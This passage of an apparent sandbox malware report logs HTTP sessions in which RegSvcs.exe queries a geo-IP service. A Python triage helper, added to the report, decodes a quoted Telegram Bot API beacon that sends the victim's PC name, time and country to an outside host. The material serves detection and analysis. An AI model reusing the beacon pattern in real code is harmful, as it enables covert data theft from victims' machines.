Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 17:46:47 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

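The sessions above show the beacon pattern end to end: RegSvcs.exe, a .NET Framework utility with no reason to talk to the internet, repeatedly fetches /xml/8.46.123.189 (its own public IP) from reallyfreegeoip.org, then sends one Telegram Bot API sendMessage whose URL carries the PC name, the host's local date and time, and the country name taken from that XML. In the captured request the path is /bot/sendMessage, so no bot token sits between /bot and /sendMessage, and chat_id is blank; the 404 Not Found the API returns is consistent with that. The Python below is an added triage example, not part of the Joe Sandbox report. The request lines, Host headers, PIDs, process path and the leading bytes of the geo-IP Data Raw row are copied from sessions 3, 9 and 10 on this page; the record layout, the LOLBIN_HOSTS set and every function name are this example's own choices.

```python
"""Triage helper for the HTTP sessions on this page: tag the geo-IP lookups
and the Telegram Bot API beacon, pair them by PID, and decode the beacon."""
import re
from ntpath import basename
from urllib.parse import parse_qs, urlsplit

# Constructed sample: request lines, Host headers, PIDs and process paths are
# copied from sessions 3, 9 and 10 above; the dict layout is this example's own.
SESSIONS = [
    {"id": 3, "pid": 3328, "host": "reallyfreegeoip.org",
     "process": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "request": "GET /xml/8.46.123.189 HTTP/1.1"},
    {"id": 9, "pid": 3328, "host": "api.telegram.org",
     "process": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "request": "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706"
                "%0D%0ADate%20and%20Time:%2011/01/2025%20/%2000:31:36%0D%0ACountry"
                "%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the"
                "%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system"
                "%20storage's%20empty.%20%5D HTTP/1.1"},
    {"id": 10, "pid": 4048, "host": "reallyfreegeoip.org",
     "process": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "request": "GET /xml/8.46.123.189 HTTP/1.1"},
]

# Leading bytes of the geo-IP Data Raw row (copied from the page; the page's
# display is itself truncated, so this XML fragment is deliberately incomplete).
GEOIP_RAW_HEX = (
    "3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 "
    "3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e "
    "74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 "
    "64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e"
)

# .NET Framework utilities commonly used as injection hosts; none of them has a
# reason to open outbound HTTPS. Assumption: this list is mine, tune it locally.
LOLBIN_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}
# Bot API paths are /bot<token>/<method>; an empty token still matches.
TELEGRAM_PATH = re.compile(r"^/bot(?P<token>[^/]*)/(?P<method>\w+)$")


def split_request_line(request_line):
    """'GET /path?q=1 HTTP/1.1' -> (verb, path, query)."""
    verb, target, _version = request_line.split(" ", 2)
    parts = urlsplit(target)
    return verb, parts.path, parts.query


def country_from_geoip(raw_hex):
    """Pull CountryName out of a (possibly truncated) geo-IP XML reply; this is
    the value that ends up in the beacon's 'Country Name' line."""
    xml = bytes.fromhex(raw_hex).decode("utf-8", "replace")
    m = re.search(r"<CountryName>([^<]*)</CountryName>", xml)
    return m.group(1) if m else None


def parse_telegram_beacon(request_line):
    """Decode a Bot API call into token, chat_id and the 'key: value' lines of
    the URL-encoded text parameter. Returns None for non-Bot-API paths."""
    _verb, path, query = split_request_line(request_line)
    m = TELEGRAM_PATH.match(path)
    if not m:
        return None
    # keep_blank_values matters: parse_qs silently drops 'chat_id=' otherwise.
    params = parse_qs(query, keep_blank_values=True)
    text = params.get("text", [""])[0]
    fields = {}
    for line in text.split("\r\n"):
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return {"token": m.group("token"), "method": m.group("method"),
            "chat_id": params.get("chat_id", [""])[0], "fields": fields}


def classify_session(session):
    """Triage tags for one session record."""
    tags = []
    _verb, path, _query = split_request_line(session["request"])
    if basename(session["process"]).lower() in LOLBIN_HOSTS:
        tags.append("lolbin-outbound")
    if session["host"] == "reallyfreegeoip.org" and path.startswith("/xml/"):
        tags.append("geoip-lookup:" + path[len("/xml/"):])
    if session["host"] == "api.telegram.org" and parse_telegram_beacon(session["request"]):
        tags.append("telegram-bot-api")
    return tags


def hunt(sessions):
    """Tag every session and list the geo-IP lookups made by a PID that also
    sent a Telegram beacon: the lookup feeds the beacon's country field."""
    tags = {s["id"]: classify_session(s) for s in sessions}
    beacon_pids = {s["pid"] for s in sessions if "telegram-bot-api" in tags[s["id"]]}
    chained = [s["id"] for s in sessions if s["pid"] in beacon_pids
               and any(t.startswith("geoip-lookup") for t in tags[s["id"]])]
    return {"tags": tags, "beacon_pids": beacon_pids, "geoip_chained": chained}


if __name__ == "__main__":
    print(hunt(SESSIONS))
    print(parse_telegram_beacon(SESSIONS[1]["request"]))
```

Pairing by PID is what separates this from a plain domain match: session 10 is the same geo-IP lookup from a second RegSvcs.exe instance (PID 4048) that never beacons in the captured window, so it is tagged but not chained. The decoded text is the only place the hostname and local time appear in cleartext on the wire; everything else is TLS, so the Host header and the Bot API path shape are what network detection has to key on.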

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 49755 | 104.21.64.144 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:50 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:51 UTC | 853 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:50 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846000
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LDSiWa%2BOTRJdHwcynXRNpWFJGtgNspHxiONkYcQjMFEIc1338l1Eio4hOE38AciJiyj0CWzh%2BXHRcbUFZ46g2YV92pPcH5LeB4j14Vm5xLU0IDEwFSKNQ0dolIiwg9FcQ6wCwn33"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d246b614414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1736&rtt_var=655&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1663817&cwnd=180&unsent_bytes=0&cid=29387f7145eb9f91&ts=170&x=0"
2025-01-10 17:46:51 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 49756 | 104.21.64.1 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:51 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 17:46:51 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:51 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846000
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wwouYBO1YdwU6iiQELVde8P%2BHgow%2FbRfe7aGjn%2B108GrnuXb%2Fxz%2FOyaWJMUr6Wf1YhIiTUhzVPSvr6IexxZykW9DLBfFF4MKt3hY%2BaY9RdxiouADjaACbN1pVO8qMbg5GnsP5qFC"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d29cceec358-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1778&min_rtt=1690&rtt_var=697&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1727810&cwnd=155&unsent_bytes=0&cid=49914c0cc1062f47&ts=158&x=0"
2025-01-10 17:46:51 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 49758 | 104.21.64.1 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:53 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 17:46:53 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:53 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846002
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XLCxHnbgKseVm8anToNbdLN4AGRI4CWRjzC1HqAiz%2Fm7uRqfoZxErfXV%2B%2BKsXpomiDMEp5DaVm0kOFmQixunAAvhAZ%2BQc6Fm3GCPmf5euZX7MK3o6ry33FhGVxD5EcgCP381huf%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d344a77de95-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=34284&min_rtt=32327&rtt_var=16037&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=60853&cwnd=243&unsent_bytes=0&cid=1e87b7b9ab5b948d&ts=272&x=0"
2025-01-10 17:46:53 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 49761 | 104.21.64.1 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:54 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:54 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:54 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846004
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tz16wgm9lo4fJxSTSChAHELrat0zeGE1HNyPfvre2RxQkbfDcyOuXFjGSuw2pftz7%2F%2B8rlk2uldsI4y3V4aX%2F3QX7gyotLbF3Vz%2BTIpZ6QkxgfWsxIxdp4Y%2B8MKbD%2BTy6RcVcumv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d3d5d27c358-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1740&min_rtt=1657&rtt_var=788&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1255913&cwnd=155&unsent_bytes=0&cid=8d2810a62bb454f0&ts=274&x=0"
2025-01-10 17:46:54 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 49763 | 104.21.64.1 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:56 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 17:46:56 UTC | 851 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:56 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846005
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9ojz5DxwOPeuQMvwetprcawYASiyUhTgGMTPhipLlr6XEOK7X3OTuOhLojWxBHQV1oDCsauTHdqHSq9oohgje9JgZC4Lxu0kAqRmGXX3EZkJgFrfKPyQSNfQ%2FvXmOFyG2JtTYpPh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d459f527c6a-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2213&min_rtt=1998&rtt_var=903&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1461461&cwnd=218&unsent_bytes=0&cid=597a17fc690332dc&ts=165&x=0"
2025-01-10 17:46:56 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 49765 | 104.21.64.1 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:57 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:46:57 UTC | 859 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:57 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846006
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sO%2B2PQX6a816e2ycE3uSRZ2Jgb4x6meLD%2FNRLIYDg6Df7sIiT6jHFDmnFneWxRsQrqigFmsaInU%2BQEJjg7LPLMedEBEMJtLOW36vQQIHOQsTN3e6c2P%2F4HHytSGiCO44EuRO%2Fx7d"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d4dafea42e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1918&min_rtt=1683&rtt_var=799&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1734997&cwnd=240&unsent_bytes=0&cid=33d9b817164cb747&ts=158&x=0"
2025-01-10 17:46:57 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.4 | 49767 | 104.21.64.1 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:46:58 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
2025-01-10 17:46:58 UTC | 861 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:46:58 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846008
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Toi1Kt%2F%2BK37DQFGoUr8AStuw577bbfbQ3NZOGg4%2BwDCN2xvRkdkT0zqnO2SeVR%2FJNYw8%2BvNNoK1ud2WwqhB0chr0UybsDhz%2BqEBOVeTD6FM4ThwSQYI6RBldt40b3Ey3zZh2t4iW"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d55e9ce42e9-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1691&min_rtt=1691&rtt_var=635&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1721698&cwnd=240&unsent_bytes=0&cid=3f59ee3dadc52d65&ts=154&x=0"
2025-01-10 17:46:58 UTC | 362 | IN | Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.4 | 49769 | 104.21.64.1 | 443 | 4048 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 17:47:00 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2025-01-10 17:47:00 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Fri, 10 Jan 2025 17:47:00 GMT
Content-Type: text/xml
Content-Length: 362
Connection: close
Age: 1846009
Cache-Control: max-age=31536000
cf-cache-status: HIT
last-modified: Fri, 20 Dec 2024 09:00:10 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VB1oh6GtJzR1vR7Y6jzqHh4CaQxSjp5uuhhxv666TSsCFTnkHXaY%2FENMSEpxzsQyMXnKp8N%2BYkugiAWq6FOUChvNAs1zfE2iLpX35UFE2W5vfAUux0RdKaAkZ7x1ocP5b2MP%2F6KN"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ffe7d5f3e9f4414-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=4112&min_rtt=1963&rtt_var=2217&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1487519&cwnd=180&unsent_bytes=0&cid=719044e77a2e761b&ts=162&x=0"
